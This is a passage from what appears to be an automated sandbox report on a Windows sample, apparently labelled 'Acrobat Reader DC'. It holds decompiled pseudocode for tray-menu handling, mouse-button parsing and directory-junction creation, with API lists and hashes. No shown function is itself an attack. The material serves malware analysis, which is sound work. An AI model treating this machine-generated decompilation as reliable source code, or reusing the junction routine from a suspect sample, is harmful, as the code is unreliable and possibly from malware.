									E0045FBAC(_t88, 0, 0x484ea8, 0xffffffff, 0xffffffff, 0);
								}
								_t88[0x274] = 3;
								E0045FBAC(_t88, 0, _t88[0x1f], 0xffffffff, 0xffffffff, 0);
								_t88[0x274] = 5;
								E0045FBAC(_t88, 0, 0x484ea8, 0xffffffff, 0xffffffff, 0);
								_t88[0x274] = 2;
								E0045FBAC(_t88, 0, _t88[0x1b], 0xffffffff, 0xffffffff, 0);
								_t88[0x274] = _v12;
								_t88[2] = 1;
							}
						}
						_t51 = GetMenuItemCount( *_t88);
						if(_t51 <= 0) {
							goto L34;
						} else {
							if(_t88[1] != 0) {
								if(_t88[1] != 0) {
									 *0x4974ec = 1;
									_v68.fMask = 1;
									_v68.fState = 8;
									SetMenuItemInfoW( *_t88, 4, 0,  &_v68);
								}
							} else {
								_t88[1] = 0;
							}
							GetCursorPos( &_v20);
							_t87 = _a8;
							SetForegroundWindow(_t87);
							TrackPopupMenuEx( *_t88, 0, _v20, _v20.y, _t87, 0);
							PostMessageW(_t87, 0, 0, 0);
							return E00401B80(_t88, _t99);
						}
					}
				}
				switch( *((intOrPtr*)(_t51 * 4 +  &M00468D82))) {
					case 0:
						__edi = 0x40;
						_push(0xfffffff5);
						goto L19;
					case 1:
						_t85 = 1;
						_push(0xfffffff9);
						goto L19;
					case 2:
						__edi = 2;
						_push(0xfffffff8);
						goto L19;
					case 3:
						__eflags =  *((char*)(__esi + 0xa));
						__edi = 4;
						if(__eflags == 0) {
							L14:
							_push(0xfffffff3);
							goto L19;
						}
						__ebx = 7;
						_v68.fMask = 1;
						_v68.fState = 8;
						__eflags = __ecx - 7;
						if(__eflags < 0) {
							goto L14;
						} else {
							_a4 = __esi + 0x1d0;
							do {
								__eax = _a4;
								__eax =  *_a4;
								__eflags = __eax;
								if(__eax == 0) {
									goto L11;
								}
								__ecx =  &_v68;
								__eax = GetMenuItemInfoW( *__eax, __ebx, 0, __ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L11;
								}
								__eflags = _v68.fState & 0x00001000;
								if((_v68.fState & 0x00001000) == 0) {
									goto L11;
								}
								__eax = _a4;
								__ecx =  *_a4;
								__eflags = __ecx->cbSize -  *__esi;
								if(__eflags == 0) {
									__eax = E00453B6F(__ecx, __eflags, __esi, __ebx);
									goto L14;
								}
								L11:
								_a4 = _a4 + __edi;
								__ebx = __ebx + 1;
								__eflags = __ebx -  *((intOrPtr*)(__esi + 0x9d0));
							} while (__eflags <= 0);
							_push(0xfffffff3);
							goto L19;
						}
					case 4:
						__edi = 8;
						_push(0xfffffff7);
						goto L19;
					case 5:
						__edi = 0x10;
						_push(0xfffffff6);
						goto L19;
					case 6:
						__edi = 0x20;
						_push(0xfffffff2);
						L19:
						_push(_t88);
						_t51 = E00453B16(_t74, _t91);
						goto L20;
				}
			}











                                  0x00468b0e
                                  0x00468b16
                                  0x00468b22
                                  0x00468b29
                                  0x00468b37
                                  0x00468b3f
                                  0x00468b41
                                  0x00468b47
                                  0x00468c12
                                  0x00468c15
                                  0x00468d7f
                                  0x00468d7f
                                  0x00468c28
                                  0x00468c32
                                  0x00468cd9
                                  0x00468ce2
                                  0x00468ceb
                                  0x00468cf4
                                  0x00468cf6
                                  0x00468c38
                                  0x00468c3c
                                  0x00468c49
                                  0x00468c59
                                  0x00468c63
                                  0x00468c63
                                  0x00468c75
                                  0x00468c7f
                                  0x00468c92
                                  0x00468c9c
                                  0x00468cae
                                  0x00468cb8
                                  0x00468cc0
                                  0x00468cc6
                                  0x00468cc6
                                  0x00468c3c
                                  0x00468cfd
                                  0x00468d01
                                  0x00000000
                                  0x00468d03
                                  0x00468d07
                                  0x00468d13
                                  0x00468d20
                                  0x00468d27
                                  0x00468d2e
                                  0x00468d35
                                  0x00468d35
                                  0x00468d09
                                  0x00468d09
                                  0x00468d09
                                  0x00468d3f
                                  0x00468d45
                                  0x00468d49
                                  0x00468d5f
                                  0x00468d6c
                                  0x00000000
                                  0x00468d74
                                  0x00468d01
                                  0x00468c15
                                  0x00468b4d
                                  0x00000000
                                  0x00468c05
                                  0x00468c0a
                                  0x00000000
                                  0x00000000
                                  0x00468b54
                                  0x00468b59
                                  0x00000000
                                  0x00000000
                                  0x00468b60
                                  0x00468b65
                                  0x00000000
                                  0x00000000
                                  0x00468b6c
                                  0x00468b70
                                  0x00468b75
                                  0x00468be6
                                  0x00468be6
                                  0x00000000
                                  0x00468be6
                                  0x00468b77
                                  0x00468b7c
                                  0x00468b83
                                  0x00468b8a
                                  0x00468b8c
                                  0x00000000
                                  0x00468b8e
                                  0x00468b94
                                  0x00468b9e
                                  0x00468b9e
                                  0x00468ba1
                                  0x00468ba3
                                  0x00468ba5
                                  0x00000000
                                  0x00000000
                                  0x00468ba9
                                  0x00468bb1
                                  0x00468bb7
                                  0x00468bb9
                                  0x00000000
                                  0x00000000
                                  0x00468bbb
                                  0x00468bc2
                                  0x00000000
                                  0x00000000
                                  0x00468bc4
                                  0x00468bc7
                                  0x00468bcb
                                  0x00468bcd
                                  0x00468be1
                                  0x00000000
                                  0x00468be1
                                  0x00468bcf
                                  0x00468bcf
                                  0x00468bd2
                                  0x00468bd3
                                  0x00468bd3
                                  0x00468bdb
                                  0x00000000
                                  0x00468bdb
                                  0x00000000
                                  0x00468bea
                                  0x00468bef
                                  0x00000000
                                  0x00000000
                                  0x00468bf3
                                  0x00468bf8
                                  0x00000000
                                  0x00000000
                                  0x00468bfc
                                  0x00468c01
                                  0x00468c0c
                                  0x00468c0c
                                  0x00468c0d
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • _memset.LIBCMT ref: 00468B29
                                  • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                  • GetMenuItemCount.USER32 ref: 00468C45
                                  • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                  • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                  • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                  • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                  • GetMenuItemCount.USER32 ref: 00468CFD
                                  • SetMenuItemInfoW.USER32 ref: 00468D35
                                  • GetCursorPos.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D3F
                                  • SetForegroundWindow.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D49
                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                  • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                  • String ID: 0
                                  • API String ID: 3993528054-4108050209
                                  • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                  • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                  • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                  • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00431BE8 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 116COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E00431BE8(long _a4, WCHAR* _a8, intOrPtr _a12) {
				char _v524;
				char _v2068;
				short _v2072;
				short _v2074;
				signed short _v2080;
				void _v2084;
				short _v2604;
				long _t31;
				int _t35;
				signed short _t44;
				int _t46;
				WCHAR* _t52;
				signed int _t69;
				void* _t74;
				void* _t77;

				_t62 = _a4;
				_t52 = _a8;
				_t31 = GetFullPathNameW(_a4, 0x104,  &_v2604,  &_a8);
				if(_t31 != 0) {
					E0041329B(_t62,  &_v524, L"\\??\\%s",  &_v2604);
					_t69 = E004111C1( &_v524);
					if( *((short*)(_t77 + _t69 * 2 - 0x20a)) == 0x5c &&  *((short*)(_t77 + _t69 * 2 - 0x20c)) != 0x3a) {
						 *((short*)(_t77 + _t69 * 2 - 0x20a)) = 0;
					}
					_t35 = CreateDirectoryW(_t52, 0);
					if(_t35 != 0 || _a12 != _t35) {
						_t74 = CreateFileW(_t52, 0x40000000, 0, 0, 3, 0x2200000, 0);
						if(_t74 == 0xffffffff) {
							L11:
							RemoveDirectoryW(_t52);
							return 0;
						} else {
							E00412F40( &_v2084, 0, 0x14);
							_v2074 = _t69 + _t69;
							_v2084 = 0xa0000003;
							_v2072 = _v2074 + 2;
							E00412FBA( &_v2068,  &_v524, 0x104);
							_t44 = _v2074 + 0xc;
							_v2080 = _t44;
							_t46 = DeviceIoControl(_t74, 0x900a4,  &_v2084, (_t44 & 0x0000ffff) + 8, 0, 0,  &_a4, 0);
							_push(_t74);
							if(_t46 != 0) {
								CloseHandle();
								return 1;
							} else {
								CloseHandle();
								goto L11;
							}
						}
					} else {
						return _t35;
					}
				} else {
					return _t31;
				}
			}


















                                  0x00431beb
                                  0x00431bf5
                                  0x00431c09
                                  0x00431c11
                                  0x00431c2e
                                  0x00431c3f
                                  0x00431c4d
                                  0x00431c5c
                                  0x00431c5c
                                  0x00431c67
                                  0x00431c6f
                                  0x00431c98
                                  0x00431c9d
                                  0x00431d31
                                  0x00431d32
                                  0x00431d40
                                  0x00431ca3
                                  0x00431cae
                                  0x00431cb6
                                  0x00431cd9
                                  0x00431ce3
                                  0x00431cea
                                  0x00431cfa
                                  0x00431d0c
                                  0x00431d20
                                  0x00431d26
                                  0x00431d29
                                  0x00431d43
                                  0x00431d54
                                  0x00431d2b
                                  0x00431d2b
                                  0x00000000
                                  0x00431d2b
                                  0x00431d29
                                  0x00431c76
                                  0x00431c7b
                                  0x00431c7b
                                  0x00431c13
                                  0x00431c17
                                  0x00431c17

                                  APIs
                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                  • __swprintf.LIBCMT ref: 00431C2E
                                  • _wcslen.LIBCMT ref: 00431C3A
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                  • String ID: :$\$\??\%s
                                  • API String ID: 2192556992-3457252023
                                  • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                  • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                  • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                  • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E0044B98C(void* __edi, short* _a4) {
				signed int _t8;
				signed int _t10;
				signed char _t14;
				signed int _t17;

				_t25 = _a4;
				if( *_a4 == 0 || E004114AB(__edi, _t25, L"LEFT") == 0) {
					return 1;
				} else {
					if(E004114AB(__edi, _t25, L"RIGHT") != 0) {
						_t8 = E004114AB(__edi, _t25, L"MIDDLE");
						__eflags = _t8;
						if(_t8 != 0) {
							__eflags = E004114AB(__edi, _t25, L"MAIN");
							if(__eflags == 0) {
								L10:
								_t10 = E0040F210(__eflags);
								__eflags = _t10;
								_t3 = _t10 != 0;
								__eflags = _t3;
								_t4 = (0 | _t3) + 1; // 0x1
								return _t4;
							} else {
								__eflags = E004114AB(__edi, _t25, L"PRIMARY");
								if(__eflags == 0) {
									goto L10;
								} else {
									__eflags = E004114AB(__edi, _t25, L"MENU");
									if(__eflags == 0) {
										L9:
										_t14 = E0040F210(__eflags);
										asm("sbb eax, eax");
										_t17 =  ~(_t14 & 0x000000ff) + 2;
										__eflags = _t17;
										return _t17;
									} else {
										__eflags = E004114AB(__edi, _t25, L"SECONDARY");
										if(__eflags == 0) {
											goto L9;
										} else {
											__eflags = 0;
											return 0;
										}
									}
								}
							}
						} else {
							return 3;
						}
					} else {
						return 2;
					}
				}
			}







                                  0x0044b990
                                  0x0044b997
                                  0x0044ba49
                                  0x0044b9b3
                                  0x0044b9c3
                                  0x0044ba50
                                  0x0044ba58
                                  0x0044ba5a
                                  0x0044b9df
                                  0x0044b9e1
                                  0x0044ba30
                                  0x0044ba30
                                  0x0044ba37
                                  0x0044ba39
                                  0x0044ba39
                                  0x0044ba3d
                                  0x0044ba41
                                  0x0044b9e3
                                  0x0044b9f1
                                  0x0044b9f3
                                  0x00000000
                                  0x0044b9f5
                                  0x0044ba03
                                  0x0044ba05
                                  0x0044ba1e
                                  0x0044ba1e
                                  0x0044ba28
                                  0x0044ba2a
                                  0x0044ba2a
                                  0x0044ba2f
                                  0x0044ba07
                                  0x0044ba15
                                  0x0044ba17
                                  0x00000000
                                  0x0044ba19
                                  0x0044ba19
                                  0x0044ba1d
                                  0x0044ba1d
                                  0x0044ba17
                                  0x0044ba05
                                  0x0044b9f3
                                  0x0044ba60
                                  0x0044ba67
                                  0x0044ba67
                                  0x0044b9c9
                                  0x0044b9d0
                                  0x0044b9d0
                                  0x0044b9c3

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll
                                  • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                  • API String ID: 3832890014-4202584635
                                  • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                  • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                  • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                  • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045FD57 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 227windowsleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0045FD57(void* __eflags, void* __fp0, signed int _a4, int _a8, int _a12) {
				int _v12;
				char _v16;
				int _v20;
				struct tagMENUITEMINFOW _v68;
				struct HMENU__** _t69;
				signed int _t81;
				int _t82;
				signed int _t85;
				intOrPtr _t86;
				signed int _t88;
				intOrPtr _t89;
				signed int _t91;
				unsigned int _t99;
				signed int _t100;
				struct HMENU__* _t101;
				int _t113;
				int _t114;
				int _t115;
				int _t118;
				int _t119;
				struct HMENU__** _t120;
				void* _t126;

				_t126 = __fp0;
				_t99 = _a8;
				_t120 = _a4;
				_v68.cbSize = 0x30;
				E00412F40( &(_v68.fMask), 0, 0x2c);
				_t102 =  &_a8;
				_v68.fMask = 1;
				_a8 = 0xffffffff;
				if(E00434179(_t120, _t99 & 0x0000ffff,  &_a8) == 0) {
					L38:
					__eflags = 0;
					return 0;
				} else {
					_t113 = _a8;
					_t69 =  *(_t120 + 0x1b4 + _t113 * 4);
					if(_t113 != 3) {
						__eflags = _t113 - 4;
						if(_t113 != 4) {
							_t100 = _t99 >> 0x10;
							__eflags = _t100;
							if(_t100 != 0) {
								goto L38;
							} else {
								__eflags = _a12 - _t100;
								if(_a12 != _t100) {
									goto L38;
								} else {
									__eflags =  *0x4974ec - _t100;
									if( *0x4974ec != _t100) {
										goto L38;
									} else {
										__eflags = _t120[1];
										_t101 =  *_t69;
										if(_t120[1] == 0) {
											L34:
											__eflags = _t120[1];
											if(__eflags == 0) {
												goto L33;
											} else {
												GetMenuItemInfoW(_t101, _t113, 0,  &_v68);
												__eflags = _v68.fState & 0x00000008;
												if((_v68.fState & 0x00000008) == 0) {
													_t62 =  &(_v68.fState);
													 *_t62 = _v68.fState | 0x00000008;
													__eflags =  *_t62;
													SetMenuItemInfoW(_t101, _t113, 0,  &_v68);
													E00453B6F( &_v68, __eflags, _t120, _t113);
													return 1;
												} else {
													_t59 =  &(_v68.fState);
													 *_t59 = _v68.fState ^ 0x00000008;
													__eflags =  *_t59;
													SetMenuItemInfoW(_t101, _t113, 0,  &_v68);
													E00453B6F( &_v68, __eflags, _t120, _t113);
													return 1;
												}
											}
										} else {
											__eflags = _t69[1];
											if(_t69[1] == 0) {
												goto L34;
											} else {
												_a12 = 0xffffffff;
												_t81 = GetMenuItemCount(_t101);
												__eflags = _t120[1];
												_a4 = _t81;
												if(_t120[1] != 0) {
													_t81 = _t81 - 4;
													__eflags = _t81;
													_a4 = _t81;
												}
												_t114 = 0;
												__eflags = _t81;
												if(_t81 <= 0) {
													_t82 = _a12;
													goto L22;
												} else {
													while(1) {
														_t82 = GetMenuItemID(_t101, _t114);
														__eflags = _t82 - _a8;
														if(_t82 == _a8) {
															break;
														}
														_t114 = _t114 + 1;
														__eflags = _t114 - _a4;
														if(_t114 < _a4) {
															continue;
														} else {
															L22:
															__eflags = _t82 - _a8;
															if(__eflags == 0) {
																break;
															}
														}
														goto L32;
													}
													_v12 = _t114;
													_t115 = _t114 - 1;
													__eflags = _t115;
													while(_t115 >= 0) {
														_a12 = GetMenuItemID(_t101, _t115);
														_t88 = E00434179(_t120, _t87,  &_v16);
														__eflags = _t88;
														if(_t88 == 0) {
															goto L26;
														} else {
															_t89 =  *((intOrPtr*)(_t120 + 0x1b4 + _a12 * 4));
															__eflags =  *((char*)(_t89 + 5));
															if( *((char*)(_t89 + 5)) != 0) {
																goto L26;
															}
														}
														goto L27;
														L26:
														_t115 = _t115 - 1;
														__eflags = _t115;
													}
													L27:
													_v20 = _t115 + 1;
													_t118 = _v12 + 1;
													__eflags = _t118 - _a4;
													while(_t118 < _a4) {
														_a12 = GetMenuItemID(_t101, _t118);
														_t85 = E00434179(_t120, _t84,  &_v16);
														__eflags = _t85;
														if(_t85 == 0) {
															goto L30;
														} else {
															_t86 =  *((intOrPtr*)(_t120 + 0x1b4 + _a12 * 4));
															__eflags =  *((char*)(_t86 + 5));
															if( *((char*)(_t86 + 5)) != 0) {
																goto L30;
															}
														}
														goto L31;
														L30:
														_t118 = _t118 + 1;
														__eflags = _t118 - _a4;
													}
													L31:
													_t102 = _v12;
													_t119 = _t118 - 1;
													__eflags = _t119;
													CheckMenuRadioItem(_t101, _v20, _t119, _v12, 0x400);
												}
												L32:
												_t113 = _a8;
												L33:
												E00453B6F(_t102, __eflags, _t120, _t113);
												return 1;
											}
										}
									}
								}
							}
						} else {
							_t91 = GetMenuItemInfoW( *_t120, _t113, 0,  &_v68);
							__eflags = _t91;
							if(_t91 == 0) {
								goto L38;
							} else {
								__eflags = _v68.fState & 0x00000008;
								if((_v68.fState & 0x00000008) == 0) {
									_t18 =  &(_v68.fState);
									 *_t18 = _v68.fState | 0x00000008;
									__eflags =  *_t18;
									 *0x4974ec = 1;
								} else {
									_v68.fState = _v68.fState ^ 0x00000008;
									 *0x4974ec = 0;
								}
								SetMenuItemInfoW( *_t120, 4, 0,  &_v68);
								E00401B80(_t120, _t126);
								Sleep(0x1f4);
								return 1;
							}
						}
					} else {
						 *0x4974f0 = 2;
						 *0x4974e6 = 1;
						return 1;
					}
				}
			}

























                                  0x0045fd57
                                  0x0045fd5e
                                  0x0045fd62
                                  0x0045fd6e
                                  0x0045fd75
                                  0x0045fd7d
                                  0x0045fd86
                                  0x0045fd8d
                                  0x0045fd9b
                                  0x0045ffb9
                                  0x0045ffb9
                                  0x0045ffbf
                                  0x0045fda1
                                  0x0045fda1
                                  0x0045fda4
                                  0x0045fdae
                                  0x0045fdcc
                                  0x0045fdcf
                                  0x0045fe37
                                  0x0045fe3a
                                  0x0045fe3c
                                  0x00000000
                                  0x0045fe42
                                  0x0045fe42
                                  0x0045fe45
                                  0x00000000
                                  0x0045fe4b
                                  0x0045fe4b
                                  0x0045fe51
                                  0x00000000
                                  0x0045fe57
                                  0x0045fe57
                                  0x0045fe5b
                                  0x0045fe5d
                                  0x0045ff53
                                  0x0045ff53
                                  0x0045ff57
                                  0x00000000
                                  0x0045ff59
                                  0x0045ff61
                                  0x0045ff6c
                                  0x0045ff6f
                                  0x0045ff94
                                  0x0045ff94
                                  0x0045ff94
                                  0x0045ff9f
                                  0x0045ffa7
                                  0x0045ffb4
                                  0x0045ff71
                                  0x0045ff71
                                  0x0045ff71
                                  0x0045ff71
                                  0x0045ff7c
                                  0x0045ff84
                                  0x0045ff91
                                  0x0045ff91
                                  0x0045ff6f
                                  0x0045fe63
                                  0x0045fe63
                                  0x0045fe67
                                  0x00000000
                                  0x0045fe6d
                                  0x0045fe6e
                                  0x0045fe75
                                  0x0045fe7b
                                  0x0045fe7f
                                  0x0045fe82
                                  0x0045fe84
                                  0x0045fe84
                                  0x0045fe87
                                  0x0045fe87
                                  0x0045fe8a
                                  0x0045fe8c
                                  0x0045fe8e
                                  0x0045feac
                                  0x00000000
                                  0x0045fe97
                                  0x0045fe97
                                  0x0045fe99
                                  0x0045fe9f
                                  0x0045fea2
                                  0x00000000
                                  0x00000000
                                  0x0045fea4
                                  0x0045fea5
                                  0x0045fea8
                                  0x00000000
                                  0x0045feaa
                                  0x0045feaf
                                  0x0045feaf
                                  0x0045feb2
                                  0x00000000
                                  0x00000000
                                  0x0045feb2
                                  0x00000000
                                  0x0045fea8
                                  0x0045feb8
                                  0x0045febb
                                  0x0045febb
                                  0x0045febc
                                  0x0045fecc
                                  0x0045fecf
                                  0x0045fed4
                                  0x0045fed6
                                  0x00000000
                                  0x0045fed8
                                  0x0045fedb
                                  0x0045fee2
                                  0x0045fee6
                                  0x00000000
                                  0x00000000
                                  0x0045fee6
                                  0x00000000
                                  0x0045fee8
                                  0x0045fee8
                                  0x0045fee8
                                  0x0045fee8
                                  0x0045feeb
                                  0x0045feec
                                  0x0045fef2
                                  0x0045fef3
                                  0x0045fef6
                                  0x0045ff06
                                  0x0045ff09
                                  0x0045ff0e
                                  0x0045ff10
                                  0x00000000
                                  0x0045ff12
                                  0x0045ff15
                                  0x0045ff1c
                                  0x0045ff20
                                  0x00000000
                                  0x00000000
                                  0x0045ff20
                                  0x00000000
                                  0x0045ff22
                                  0x0045ff22
                                  0x0045ff23
                                  0x0045ff23
                                  0x0045ff28
                                  0x0045ff28
                                  0x0045ff34
                                  0x0045ff34
                                  0x0045ff38
                                  0x0045ff38
                                  0x0045ff3e
                                  0x0045ff3e
                                  0x0045ff41
                                  0x0045ff43
                                  0x0045ff50
                                  0x0045ff50
                                  0x0045fe67
                                  0x0045fe5d
                                  0x0045fe51
                                  0x0045fe45
                                  0x0045fdd1
                                  0x0045fddb
                                  0x0045fde1
                                  0x0045fde3
                                  0x00000000
                                  0x0045fde9
                                  0x0045fdee
                                  0x0045fdf1
                                  0x0045fdff
                                  0x0045fdff
                                  0x0045fdff
                                  0x0045fe02
                                  0x0045fdf3
                                  0x0045fdf3
                                  0x0045fdf6
                                  0x0045fdf6
                                  0x0045fe14
                                  0x0045fe1c
                                  0x0045fe26
                                  0x0045fe34
                                  0x0045fe34
                                  0x0045fde3
                                  0x0045fdb0
                                  0x0045fdb0
                                  0x0045fdba
                                  0x0045fdc9
                                  0x0045fdc9
                                  0x0045fdae

                                  APIs
                                  • _memset.LIBCMT ref: 0045FD75
                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                  • SetMenuItemInfoW.USER32 ref: 0045FE14
                                  • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: InfoItemMenu$Sleep_memset
                                  • String ID: 0
                                  • API String ID: 1504565804-4108050209
                                  • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                  • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                  • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                  • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E00460879(WCHAR* __edx, void* __fp0, intOrPtr _a4, int _a8, intOrPtr _a12) {
				WCHAR* _v24;
				intOrPtr _v28;
				void* _v44;
				char _v60;
				WCHAR* _v76;
				short _v8272;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				intOrPtr _t48;
				intOrPtr _t82;
				int _t83;
				int _t85;
				WCHAR* _t96;
				intOrPtr _t108;
				void* _t117;

				_t117 = __fp0;
				_t93 = __edx;
				_t38 = E00422240(0x2050);
				_t82 = _a4;
				_t112 = _t82;
				if(_t82 > 0) {
					_t85 =  *0x4a9130; // 0x66
					LoadStringW(GetModuleHandleW(0), _t85,  &_v8272, 0xfff);
					_t96 =  &_v8272;
					E00401B10(_t96,  &_v76, _t112);
					LoadStringW(GetModuleHandleW(0), _a8, _t96, 0xfff);
					E00401B10(_t96,  &_v60, _t112);
					_a4 = E004348DE(_t82);
					_t48 = E004348AA(_t82);
					_t106 = _t48;
					_v28 = _t48;
					_t83 = E00434908(E0043492F(_t82));
					_a8 = _t83;
